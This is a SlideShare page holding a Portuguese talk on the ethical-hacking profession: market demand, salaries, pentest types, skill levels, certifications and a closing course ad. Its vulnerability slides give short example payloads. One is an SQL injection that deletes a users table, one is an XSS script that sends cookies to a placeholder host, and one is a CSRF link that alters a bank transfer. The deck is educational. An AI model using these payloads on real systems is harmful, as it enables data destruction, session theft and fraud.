SlideShare uma empresa Scribd logo
A importância do profissional
Hacker Ético no mercado
Marcos Flávio Araújo Assunção
mflavio@defhack.com
Marcos Flávio Araújo Assunção
Formação:
Mestre em Sistemas de Informação pela Universidade Fumec
Especialista em Redes de Computadores pela ESAB
Especialista em Docência para o ensino profissional pelo Senac Minas
Graduado em Engenharia de Software pelo Centro Universitário UMA
Atuação:
Professor universitário no Centro Universitário UNA
Orientador de curso no Senac Minas
Consultor e palestrante em segurança de redes e ensino profissionalizante
Marcos Flávio Araújo Assunção
Certificações
CEH
CCNA
Cisco ITQ
Publicações:
Guia do Hacker Brasileiro
Desafio Linux Hacker
Segredos do Hacker Ético
(5 edições)
Honeypots e Honeynets
Wireless Hacking
Projetos:
Valhala Honeypot
Por que a área de IT
Security cresce tanto?
Principais problemas (Fonte: govtech.com)
Como o mercado vê o
Hacker ético
profissional?
Forbes – Hacker Ético é uma das
principais carreiras do futuro
Governo americano recruta hackers
globodigital
Cresce a busca pelo Hacker Ético
jornal-o-globo
MCT convida movimento Hacker
brasilgov
Precisa-se de Hackers experientes
estadominas-online
Quanto é o salário de
um Pentester (Ethical
Hacker) ?
Fonte: indeed.com
Pagamento médio CEH (Fonte: softwareadvice.com)
Linkedin: a fonte de oportunidades em Ethical Hacking
Freelancing em Ethical Hacking
O que faz um
profissional Hacker
Ético / Pentester ?
Penetration Test (Teste de Invasão)
 Consiste em utilizar
técnicas de Hackers em
testes de stress da
segurança de redes e
sistemas
 É a principal ferramenta
de um Hacker Ético
 CEH, LPT, Ethical Hacking
Foundation, OCSP, GWAPT,
GPEN, etc.
Padrões e entidades que exigem Penetration Tests
Teste de “stress” – Uma necessidade real
Teste de “stress” - Pressão
capacete
Teste de “stress” - Temperatura
flame-test-helmet
Fases de um PenTest
Tipos de Penetration Test
Black Box
White Box
Gray Box
Black Box
Teste realizado em um sistema remoto, sem
nenhum conhecimento do alvo. O invasor deve
partir da estaca zero, sem informações sobre
endereços IPs públicos, sistemas operacionais
utilizados, tipos de roteadores e firewalls, etc.
Esse teste visa demonstrar a visão de um
atacante de fora da intranet da empresa.
Gray Box
Teste realizado entre departamentos ou sub-redes de uma
intranet, com conhecimento parcial da estrutura. O objetivo
desse teste é demonstrar até que ponto um funcionário
consegue chegar caso ele decida tentar acessar um sistema
de outro departamento ao qual ele não tem acesso legítimo.
Nesse tipo de PenTest, temos conhecimento parcial da rede,
como a faixa de endereços IPs utilizada na sub-rede de
origem, o endereço IP do gateway e do servidor DNS, etc.
White Box
Teste realizado em uma intranet local, com total
conhecimento do alvo. Nesse teste, temos o conhecimento
total de como a rede opera, sabemos todos os dispositivos,
endereços e sistemas operacionais utilizados. A visão de um
teste White Box é a de um administrador de rede. Essa
metodologia de testagem é utilizada quando desejamos
conhecer até onde um administrador poderá ir caso deseje
acessar dados ou obter informações, tais como conversar de
MSN, senhas de usuários, e-mails alheios, etc.
Níveis de um Pentester / Ethical Hacker
Nível 1 – Júnior – Tool based Penetration Tester:
Esse profissional é aquele que somente conhece as ferramentas básicas para
o pentest, não sendo capaz de desenvolver suas próprias técnicas e ferramentas.
Muitas vezes aprenderam as técnicas em treinamentos específicos.
Aqui estão as certificações CEH, ECSA, LPT, Ethical Hacking Foundation, GPen e
GWapt
Nível 2 – Pleno – Coding based Penetration Tester:
Esse profissional é aquele que desenvolve suas próprias ferramentas e scripts para
a realização dos penetration tests, mas ainda está limitado ao teste de
vulnerabilidades já conhecidas. Consegue entretanto melhorar soluções
existentes, como criar novos módulos para o Metasploit. Necessita de
conhecimentos pelo menos em algoritmos e linguagens básicas de programação.
Temos nesse nível o OSCP.
Nível 3 – Sênior – Vulnerability Researcher:
Ao invés de realizarem PenTests, muitos hackers éticos com conhecimento
mais avançado preferem debugar o funcionamento de softwares e protocolos
em busca de falhas do tipo 0-day, e muitos são contratados por empresas com
essa finalidade. Ainda não existe uma certificação de peso neste nível.
Certificações de
Ethical Hacking
EXIN Ethical Hacking Foundation
EC-COUNCIL Certified Ethical Hacker (CEH)
EC-COUNCIL ECSA Pentest
ECCOUNCIL Licensed Penetration Tester
GIAC - GPEN
GIAC GWAPT
Offensive Security Certified Professional
Exemplos de
vulnerabilidades
testadas
Falhas de softwares
 Buffer Overflows
(Stack e Heap)
 Strings de format
vulneráveis
 Memory corruption
 Injection (SQL,
XPATH, CMD, XSS,
CSRF)
 Permissões incorretas
SQL Injection
GET /user_lookup.cfm?lastname=assuncao ’;DELETE FROM users
WHERE 1=‘1 HTTP/1.1
SELECT *
FROM users
WHERE lastname = ‘assuncao’;DELETE FROM users WHERE 1=‘1’
Cross Site Scripting <XSS>
 <script> alert(‘Oi’!) </script>
 <script>
location.href=“http://www.site.com/captura.cfm?c=“
+ document.cookie</script>
 <a href=“javas&#99;ript&#35;[código]>
 <div style=“behaviour: url([código]);”>
 <body onload=“[código]”>
 <img src=“javascript:[código]”>
Cross Site Request Forgery (CSRF)
 Exemplo: Maria está logada no site do banco e a URL da transação é:
http://banco.com/transf?conta=MARIA&quantia=100
Um ataque pode criar um link que altera o valor da transação:
<a href=http://banco.com/transf?conta=MARIA$quantia=100000>
Ou uma imagem “falsa”:
<img src=http://banco.com/transf?conta=MARIA$quantia=100000>
Quero atuar na área.
Como começar?
Treinamento em Fundamentos de Ethical Hacking
• 21 horas de vídeos
• 175 aulas
• Acesso ilimitado e eterno
• Certificado internacional
• Conteúdo aborda a maioria
das certificações de PenTest
• 50% de desconto: pague apenas 100
reais pelo curso.
Acesse para aproveitar a promoção:
www.marcosflavio.com.br
Dúvidas?
A importância do profissional
Hacker Ético no mercado
Marcos Flávio Araújo Assunção
mflavio@defhack.com

Mais conteúdo relacionado

Mais procurados

Privacidade na Internet
Privacidade na InternetPrivacidade na Internet
Privacidade na Internetvanessa finoto
 
Segurança na internet
Segurança na internetSegurança na internet
Segurança na internetLuísa Lima
 
CRIMES NA INTERNET
CRIMES NA INTERNETCRIMES NA INTERNET
CRIMES NA INTERNETNete quirino
 
Perigo nas redes sociais
Perigo nas redes sociaisPerigo nas redes sociais
Perigo nas redes sociaisPaula Lopes
 
Projeto: Montagem de uma rede local
Projeto: Montagem de uma rede local Projeto: Montagem de uma rede local
Projeto: Montagem de uma rede local Verônica Veiga
 
Tecnologias emergentes na sala de aula
Tecnologias emergentes na sala de aulaTecnologias emergentes na sala de aula
Tecnologias emergentes na sala de aulaCarlos Pinheiro
 
A História Da Internet
A História Da InternetA História Da Internet
A História Da InternetBugui94
 
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇAAULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇAMaraLuizaGonalvesFre
 
Curso completo COBIT 4.1
Curso completo COBIT 4.1Curso completo COBIT 4.1
Curso completo COBIT 4.1Fernando Palma
 
Segurança da Informação - Aula 4 - Malwares
Segurança da Informação - Aula 4 - MalwaresSegurança da Informação - Aula 4 - Malwares
Segurança da Informação - Aula 4 - MalwaresCleber Fonseca
 
A História da Segurança da Informação
A História da Segurança da InformaçãoA História da Segurança da Informação
A História da Segurança da InformaçãoAndré Santos
 
Tecnologia, Sociedade e Educação: uma encruzilhada de influências
Tecnologia, Sociedade e Educação: uma encruzilhada de influênciasTecnologia, Sociedade e Educação: uma encruzilhada de influências
Tecnologia, Sociedade e Educação: uma encruzilhada de influênciasFrancisco Santos
 

Mais procurados (20)

Privacidade na Internet
Privacidade na InternetPrivacidade na Internet
Privacidade na Internet
 
Evolução dos sistemas de informação
Evolução dos sistemas de informaçãoEvolução dos sistemas de informação
Evolução dos sistemas de informação
 
Perigos da Internet
Perigos da InternetPerigos da Internet
Perigos da Internet
 
Palestra - Segurança da Informação
Palestra - Segurança da InformaçãoPalestra - Segurança da Informação
Palestra - Segurança da Informação
 
Segurança Digital
Segurança DigitalSegurança Digital
Segurança Digital
 
Segurança na internet
Segurança na internetSegurança na internet
Segurança na internet
 
Ética na internet
Ética na internetÉtica na internet
Ética na internet
 
CRIMES NA INTERNET
CRIMES NA INTERNETCRIMES NA INTERNET
CRIMES NA INTERNET
 
Boas Práticas em Segurança da Informação
Boas Práticas em Segurança da InformaçãoBoas Práticas em Segurança da Informação
Boas Práticas em Segurança da Informação
 
Perigo nas redes sociais
Perigo nas redes sociaisPerigo nas redes sociais
Perigo nas redes sociais
 
Projeto: Montagem de uma rede local
Projeto: Montagem de uma rede local Projeto: Montagem de uma rede local
Projeto: Montagem de uma rede local
 
Tecnologias emergentes na sala de aula
Tecnologias emergentes na sala de aulaTecnologias emergentes na sala de aula
Tecnologias emergentes na sala de aula
 
A História Da Internet
A História Da InternetA História Da Internet
A História Da Internet
 
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇAAULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
 
Protocolos de Segurança
Protocolos de SegurançaProtocolos de Segurança
Protocolos de Segurança
 
Curso completo COBIT 4.1
Curso completo COBIT 4.1Curso completo COBIT 4.1
Curso completo COBIT 4.1
 
Segurança da Informação - Aula 4 - Malwares
Segurança da Informação - Aula 4 - MalwaresSegurança da Informação - Aula 4 - Malwares
Segurança da Informação - Aula 4 - Malwares
 
Pirataria Informatica
Pirataria InformaticaPirataria Informatica
Pirataria Informatica
 
A História da Segurança da Informação
A História da Segurança da InformaçãoA História da Segurança da Informação
A História da Segurança da Informação
 
Tecnologia, Sociedade e Educação: uma encruzilhada de influências
Tecnologia, Sociedade e Educação: uma encruzilhada de influênciasTecnologia, Sociedade e Educação: uma encruzilhada de influências
Tecnologia, Sociedade e Educação: uma encruzilhada de influências
 

Destaque

The Most Likeable Senior Executives Online
The Most Likeable Senior Executives OnlineThe Most Likeable Senior Executives Online
The Most Likeable Senior Executives OnlineLikeable Media
 
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...switchingonthefuture
 
Why Stittsville Needs a Public High School - Stories from Parents
Why Stittsville Needs a Public High School - Stories from ParentsWhy Stittsville Needs a Public High School - Stories from Parents
Why Stittsville Needs a Public High School - Stories from ParentsStittsvilleCentral.ca
 
Rompere YouTube col Video Marketing: i segreti del mestiere
Rompere YouTube col Video Marketing: i segreti del mestiereRompere YouTube col Video Marketing: i segreti del mestiere
Rompere YouTube col Video Marketing: i segreti del mestiereNinja Academy
 
Teori%20kelistrikan%20dasar
Teori%20kelistrikan%20dasarTeori%20kelistrikan%20dasar
Teori%20kelistrikan%20dasarFarrel Pedroza
 
ActiveRecord Observers - RORLab Season 3-6
ActiveRecord Observers - RORLab Season 3-6ActiveRecord Observers - RORLab Season 3-6
ActiveRecord Observers - RORLab Season 3-6창훈 정
 
Transparencies ch07-pp274-283
Transparencies ch07-pp274-283Transparencies ch07-pp274-283
Transparencies ch07-pp274-283lschmidt1170
 
Comparative and superlative
Comparative and superlativeComparative and superlative
Comparative and superlativeVanessa Jensen
 
7th math c2 -l15
7th math c2 -l157th math c2 -l15
7th math c2 -l15jdurst65
 
Prepaid Vs Post-paid Energy
Prepaid Vs Post-paid EnergyPrepaid Vs Post-paid Energy
Prepaid Vs Post-paid Energyphil_Brook
 
Climatic Changes and Yellow Rust Outbreak in Syria
Climatic Changes and Yellow Rust Outbreak in SyriaClimatic Changes and Yellow Rust Outbreak in Syria
Climatic Changes and Yellow Rust Outbreak in SyriaICARDA
 
Organizing with online elections
Organizing with online electionsOrganizing with online elections
Organizing with online electionsAshley Knuckles
 
痛風者救星
痛風者救星痛風者救星
痛風者救星lys167
 
1 luce è libertà
1 luce è libertà1 luce è libertà
1 luce è libertàmariadelia1
 
FameLinked - The Fame Network & Marketplace
FameLinked - The Fame Network & MarketplaceFameLinked - The Fame Network & Marketplace
FameLinked - The Fame Network & MarketplaceMichael Herlache
 

Destaque (20)

MARZO 18 AL 23 DE 2013
MARZO 18 AL 23 DE 2013MARZO 18 AL 23 DE 2013
MARZO 18 AL 23 DE 2013
 
The Most Likeable Senior Executives Online
The Most Likeable Senior Executives OnlineThe Most Likeable Senior Executives Online
The Most Likeable Senior Executives Online
 
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
 
Why Stittsville Needs a Public High School - Stories from Parents
Why Stittsville Needs a Public High School - Stories from ParentsWhy Stittsville Needs a Public High School - Stories from Parents
Why Stittsville Needs a Public High School - Stories from Parents
 
Rompere YouTube col Video Marketing: i segreti del mestiere
Rompere YouTube col Video Marketing: i segreti del mestiereRompere YouTube col Video Marketing: i segreti del mestiere
Rompere YouTube col Video Marketing: i segreti del mestiere
 
Teori%20kelistrikan%20dasar
Teori%20kelistrikan%20dasarTeori%20kelistrikan%20dasar
Teori%20kelistrikan%20dasar
 
Vayu, the Ayurvedic neurology.
Vayu, the Ayurvedic neurology.Vayu, the Ayurvedic neurology.
Vayu, the Ayurvedic neurology.
 
ActiveRecord Observers - RORLab Season 3-6
ActiveRecord Observers - RORLab Season 3-6ActiveRecord Observers - RORLab Season 3-6
ActiveRecord Observers - RORLab Season 3-6
 
Transparencies ch07-pp274-283
Transparencies ch07-pp274-283Transparencies ch07-pp274-283
Transparencies ch07-pp274-283
 
Comparative and superlative
Comparative and superlativeComparative and superlative
Comparative and superlative
 
vivek
vivekvivek
vivek
 
7th math c2 -l15
7th math c2 -l157th math c2 -l15
7th math c2 -l15
 
Prepaid Vs Post-paid Energy
Prepaid Vs Post-paid EnergyPrepaid Vs Post-paid Energy
Prepaid Vs Post-paid Energy
 
Climatic Changes and Yellow Rust Outbreak in Syria
Climatic Changes and Yellow Rust Outbreak in SyriaClimatic Changes and Yellow Rust Outbreak in Syria
Climatic Changes and Yellow Rust Outbreak in Syria
 
Catholic doctor
Catholic doctorCatholic doctor
Catholic doctor
 
Organizing with online elections
Organizing with online electionsOrganizing with online elections
Organizing with online elections
 
痛風者救星
痛風者救星痛風者救星
痛風者救星
 
1 luce è libertà
1 luce è libertà1 luce è libertà
1 luce è libertà
 
FameLinked - The Fame Network & Marketplace
FameLinked - The Fame Network & MarketplaceFameLinked - The Fame Network & Marketplace
FameLinked - The Fame Network & Marketplace
 
100%
100%100%
100%
 

Semelhante a Importância do profissional Hacker ético no mercado de trabalho

Ethical Hacker - Segurança da Informação
Ethical Hacker - Segurança da InformaçãoEthical Hacker - Segurança da Informação
Ethical Hacker - Segurança da InformaçãoGionni Lúcio
 
Segurança da informação
Segurança da informaçãoSegurança da informação
Segurança da informaçãoSamantha Nunes
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesAlisson Fuckner
 
[GUTS-RS] - Testes de Segurança: O que preciso saber para planejar
 [GUTS-RS] - Testes de Segurança: O que preciso saber para planejar [GUTS-RS] - Testes de Segurança: O que preciso saber para planejar
[GUTS-RS] - Testes de Segurança: O que preciso saber para planejarGUTS-RS
 
Desenvolvimento de exploits
Desenvolvimento de exploitsDesenvolvimento de exploits
Desenvolvimento de exploitsNaraBarros10
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Roberto Soares
 
Semana34b - Brute Force Online.pdf
Semana34b - Brute Force Online.pdfSemana34b - Brute Force Online.pdf
Semana34b - Brute Force Online.pdffabio154906
 
Analise de Vulnerabilidade
Analise de VulnerabilidadeAnalise de Vulnerabilidade
Analise de VulnerabilidadeCassio Ramos
 
Slides ataques e vulnerabilidades
Slides   ataques e vulnerabilidadesSlides   ataques e vulnerabilidades
Slides ataques e vulnerabilidadescheeshirecat
 
Como começar na área de PenTest - Womcy Security Day Fatec
Como começar na área de PenTest - Womcy Security Day FatecComo começar na área de PenTest - Womcy Security Day Fatec
Como começar na área de PenTest - Womcy Security Day FatecJoas Antonio dos Santos
 
P3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
P3nte5t w1th Arm1t4ge - Lucas Oliveira DantasP3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
P3nte5t w1th Arm1t4ge - Lucas Oliveira DantasPotiLivre Sobrenome
 

Semelhante a Importância do profissional Hacker ético no mercado de trabalho (20)

Ethical Hacker - Segurança da Informação
Ethical Hacker - Segurança da InformaçãoEthical Hacker - Segurança da Informação
Ethical Hacker - Segurança da Informação
 
Ethical Hacking - Campus Party Brasília 2017
Ethical Hacking - Campus Party Brasília 2017Ethical Hacking - Campus Party Brasília 2017
Ethical Hacking - Campus Party Brasília 2017
 
Introdução de teste de segurança app web
Introdução de teste de segurança app webIntrodução de teste de segurança app web
Introdução de teste de segurança app web
 
Aula de seguranca (1)
Aula de seguranca (1)Aula de seguranca (1)
Aula de seguranca (1)
 
Hacker Ético
Hacker ÉticoHacker Ético
Hacker Ético
 
Segurança da informação
Segurança da informaçãoSegurança da informação
Segurança da informação
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redes
 
[GUTS-RS] - Testes de Segurança: O que preciso saber para planejar
 [GUTS-RS] - Testes de Segurança: O que preciso saber para planejar [GUTS-RS] - Testes de Segurança: O que preciso saber para planejar
[GUTS-RS] - Testes de Segurança: O que preciso saber para planejar
 
Desenvolvimento de exploits
Desenvolvimento de exploitsDesenvolvimento de exploits
Desenvolvimento de exploits
 
Java security
Java securityJava security
Java security
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"
 
Semana34b - Brute Force Online.pdf
Semana34b - Brute Force Online.pdfSemana34b - Brute Force Online.pdf
Semana34b - Brute Force Online.pdf
 
Analise de Vulnerabilidade
Analise de VulnerabilidadeAnalise de Vulnerabilidade
Analise de Vulnerabilidade
 
Slides ataques e vulnerabilidades
Slides   ataques e vulnerabilidadesSlides   ataques e vulnerabilidades
Slides ataques e vulnerabilidades
 
Artigo cientifico
Artigo cientifico Artigo cientifico
Artigo cientifico
 
PenTest com Kali linux - VI Engitec
PenTest com Kali linux - VI EngitecPenTest com Kali linux - VI Engitec
PenTest com Kali linux - VI Engitec
 
Como começar na área de PenTest - Womcy Security Day Fatec
Como começar na área de PenTest - Womcy Security Day FatecComo começar na área de PenTest - Womcy Security Day Fatec
Como começar na área de PenTest - Womcy Security Day Fatec
 
Pentest conisli07
Pentest conisli07Pentest conisli07
Pentest conisli07
 
P3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
P3nte5t w1th Arm1t4ge - Lucas Oliveira DantasP3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
P3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
 

Importância do profissional Hacker ético no mercado de trabalho

  • 1. A importância do profissional Hacker Ético no mercado Marcos Flávio Araújo Assunção mflavio@defhack.com
  • 2. Marcos Flávio Araújo Assunção Formação: Mestre em Sistemas de Informação pela Universidade Fumec Especialista em Redes de Computadores pela ESAB Especialista em Docência para o ensino profissional pelo Senac Minas Graduado em Engenharia de Software pelo Centro Universitário UMA Atuação: Professor universitário no Centro Universitário UNA Orientador de curso no Senac Minas Consultor e palestrante em segurança de redes e ensino profissionalizante
  • 3. Marcos Flávio Araújo Assunção Certificações CEH CCNA Cisco ITQ Publicações: Guia do Hacker Brasileiro Desafio Linux Hacker Segredos do Hacker Ético (5 edições) Honeypots e Honeynets Wireless Hacking Projetos: Valhala Honeypot
  • 4. Por que a área de IT Security cresce tanto?
  • 6. Como o mercado vê o Hacker ético profissional?
  • 7. Forbes – Hacker Ético é uma das principais carreiras do futuro
  • 8. Governo americano recruta hackers globodigital
  • 9. Cresce a busca pelo Hacker Ético jornal-o-globo
  • 10. MCT convida movimento Hacker brasilgov
  • 11. Precisa-se de Hackers experientes estadominas-online
  • 12. Quanto é o salário de um Pentester (Ethical Hacker) ?
  • 14. Pagamento médio CEH (Fonte: softwareadvice.com)
  • 15. Linkedin: a fonte de oportunidades em Ethical Hacking
  • 17. O que faz um profissional Hacker Ético / Pentester ?
  • 18. Penetration Test (Teste de Invasão)  Consiste em utilizar técnicas de Hackers em testes de stress da segurança de redes e sistemas  É a principal ferramenta de um Hacker Ético  CEH, LPT, Ethical Hacking Foundation, OCSP, GWAPT, GPEN, etc.
  • 19. Padrões e entidades que exigem Penetration Tests
  • 20. Teste de “stress” – Uma necessidade real
  • 21. Teste de “stress” - Pressão capacete
  • 22. Teste de “stress” - Temperatura flame-test-helmet
  • 23. Fases de um PenTest
  • 24. Tipos de Penetration Test Black Box White Box Gray Box
  • 25. Black Box Teste realizado em um sistema remoto, sem nenhum conhecimento do alvo. O invasor deve partir da estaca zero, sem informações sobre endereços IPs públicos, sistemas operacionais utilizados, tipos de roteadores e firewalls, etc. Esse teste visa demonstrar a visão de um atacante de fora da intranet da empresa.
  • 26. Gray Box Teste realizado entre departamentos ou sub-redes de uma intranet, com conhecimento parcial da estrutura. O objetivo desse teste é demonstrar até que ponto um funcionário consegue chegar caso ele decida tentar acessar um sistema de outro departamento ao qual ele não tem acesso legítimo. Nesse tipo de PenTest, temos conhecimento parcial da rede, como a faixa de endereços IPs utilizada na sub-rede de origem, o endereço IP do gateway e do servidor DNS, etc.
  • 27. White Box Teste realizado em uma intranet local, com total conhecimento do alvo. Nesse teste, temos o conhecimento total de como a rede opera, sabemos todos os dispositivos, endereços e sistemas operacionais utilizados. A visão de um teste White Box é a de um administrador de rede. Essa metodologia de testagem é utilizada quando desejamos conhecer até onde um administrador poderá ir caso deseje acessar dados ou obter informações, tais como conversar de MSN, senhas de usuários, e-mails alheios, etc.
  • 28. Níveis de um Pentester / Ethical Hacker Nível 1 – Júnior – Tool based Penetration Tester: Esse profissional é aquele que somente conhece as ferramentas básicas para o pentest, não sendo capaz de desenvolver suas próprias técnicas e ferramentas. Muitas vezes aprenderam as técnicas em treinamentos específicos. Aqui estão as certificações CEH, ECSA, LPT, Ethical Hacking Foundation, GPen e GWapt Nível 2 – Pleno – Coding based Penetration Tester: Esse profissional é aquele que desenvolve suas próprias ferramentas e scripts para a realização dos penetration tests, mas ainda está limitado ao teste de vulnerabilidades já conhecidas. Consegue entretanto melhorar soluções existentes, como criar novos módulos para o Metasploit. Necessita de conhecimentos pelo menos em algoritmos e linguagens básicas de programação. Temos nesse nível o OSCP. Nível 3 – Sênior – Vulnerability Researcher: Ao invés de realizarem PenTests, muitos hackers éticos com conhecimento mais avançado preferem debugar o funcionamento de softwares e protocolos em busca de falhas do tipo 0-day, e muitos são contratados por empresas com essa finalidade. Ainda não existe uma certificação de peso neste nível.
  • 30. EXIN Ethical Hacking Foundation
  • 38. Falhas de softwares  Buffer Overflows (Stack e Heap)  Strings de format vulneráveis  Memory corruption  Injection (SQL, XPATH, CMD, XSS, CSRF)  Permissões incorretas
  • 39. SQL Injection GET /user_lookup.cfm?lastname=assuncao ’;DELETE FROM users WHERE 1=‘1 HTTP/1.1 SELECT * FROM users WHERE lastname = ‘assuncao’;DELETE FROM users WHERE 1=‘1’
  • 40. Cross Site Scripting <XSS>  <script> alert(‘Oi’!) </script>  <script> location.href=“http://www.site.com/captura.cfm?c=“ + document.cookie</script>  <a href=“javas&#99;ript&#35;[código]>  <div style=“behaviour: url([código]);”>  <body onload=“[código]”>  <img src=“javascript:[código]”>
  • 41. Cross Site Request Forgery (CSRF)  Exemplo: Maria está logada no site do banco e a URL da transação é: http://banco.com/transf?conta=MARIA&quantia=100 Um ataque pode criar um link que altera o valor da transação: <a href=http://banco.com/transf?conta=MARIA$quantia=100000> Ou uma imagem “falsa”: <img src=http://banco.com/transf?conta=MARIA$quantia=100000>
  • 42. Quero atuar na área. Como começar?
  • 43. Treinamento em Fundamentos de Ethical Hacking • 21 horas de vídeos • 175 aulas • Acesso ilimitado e eterno • Certificado internacional • Conteúdo aborda a maioria das certificações de PenTest • 50% de desconto: pague apenas 100 reais pelo curso. Acesse para aproveitar a promoção: www.marcosflavio.com.br
  • 45. A importância do profissional Hacker Ético no mercado Marcos Flávio Araújo Assunção mflavio@defhack.com